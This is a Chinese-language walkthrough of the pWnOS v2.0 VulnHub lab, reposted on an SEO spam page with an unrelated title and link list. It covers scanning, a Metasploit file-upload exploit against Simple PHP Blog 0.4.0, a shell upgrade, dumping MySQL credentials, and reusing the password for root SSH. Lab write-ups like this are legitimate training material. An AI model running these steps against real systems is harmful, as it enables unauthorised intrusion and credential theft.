当前位置: 首页 > news >正文

iis做的网站模板seo推广的网站和平台有哪些

iis做的网站模板,seo推广的网站和平台有哪些,企业网站的功能,网页升级访问正常更新欢迎广大知识点总结: 1.通过模块来寻找漏洞 2.msf查找漏洞 3.通过网站源代码,查看模块信息 环境准备 攻击机:kali2023 靶机:pWnOS v2.0 安装地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub 在安装网址中看到,该靶…

 知识点总结:

1.通过模块来寻找漏洞

2.msf查找漏洞

3.通过网站源代码,查看模块信息

环境准备

攻击机:kali2023

靶机:pWnOS v2.0

安装地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub

在安装网址中看到,该靶机静态IP为10.10.10.100

所以我们就要修改虚拟机的"虚拟网络编辑器"

 其次靶机的虚拟机设置如下:

开始渗透!

信息收集

收集IP(虽然已经知道了)

arp-scan -l

 端口扫描

先大概看一下

nmap 10.10.10.100

再详细看一下

nmap -A -p- 10.10.10.100

看到内核版本等

访问一下80端口

扫一下目录

gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt

扫到了/blog目录,访问

查看源代码

查看到建立博客的模块模版是Simple PHP Blog 0.4.0

漏洞查找

msf查找有没有现成的漏洞

search Simple PHP Blog 0.4.0

存在,那我们直接利用

use unix/webapp/sphpblog_file_upload
set Rhost 10.10.10.100
set uri /blog      //填有该模块的url,此处写为uri
run                  //运行
shell                  //开启命令行
python -c 'import pty;pty.spawn("/bin/bash")'  //优化命令行

提权

查看一下目录

存在文件:mysqli_connect.php,看看

拿到数据库root密码,登录

看看能不能拿到相关账户密码,分别执行下述命令爆库

show databases;
use mysql;
show tables;
select * from user;

最后看到

看到root的好多密码都是一致的,具体解密我也不知道,所以没有解密成功!

但是我们可以用上面的那个密码再登录一下ssh试试

ssh root@10.10.10.100

 成功root!

http://www.tj-hxxt.cn/news/30185.html

相关文章:

  • 企业做淘宝网站需要多少钱公司网页怎么制作
  • wordpress站内搜索框苏州网站优化排名推广
  • 公司注册网上申请网站安徽seo网络优化师
  • 深圳金融投资网站建设朋友圈推广文案
  • 做手机网站和pc如何做淘宝网官方网站
  • 宁晋seo网站优化排名今日冯站长之家
  • 竞价托管公司排名公司seo是什么意思
  • 论某网站职能建设百度指数查询官方网
  • 网站建设方案案例做网站的网络公司
  • 酒店网站制作策划网站建站开发
  • 怎样注册公司网站建立网页怎样优化网络
  • 珠海网站建seo优化啥意思
  • 企业网站一年多少钱手机网站模板下载
  • 常德企业网站建设制造企业网站建设
  • 黄骅广信建设集团网站引擎优化seo
  • 亳州市建设局网站黑龙江暴雪预警
  • 南通网站制作外包seo优化顾问服务阿亮
  • 网站设计师加油站贵阳seo网站推广
  • 新鸿儒网站建设网站seo优化8888
  • 网络托管公司有哪些百度seo关键词点击软件
  • 十大免费视频素材网站如何让别人在百度上搜到自己公司
  • 用国外服务器做网站seo点击软件哪个好用
  • 日语论文参考文献网站网络培训机构
  • 网站后台更新栏目后 网站网络营销外包推广价格
  • 试客网站 源码seo分析网站
  • 申请域名后怎么做网站精准客户数据采集软件
  • 2345网址中国最好智推教育seo课程
  • 网站整合discuz如何建立企业网站
  • 第一模板网站爱论坛
  • 跨境电商自己做网站卖衣服最新中央人事任免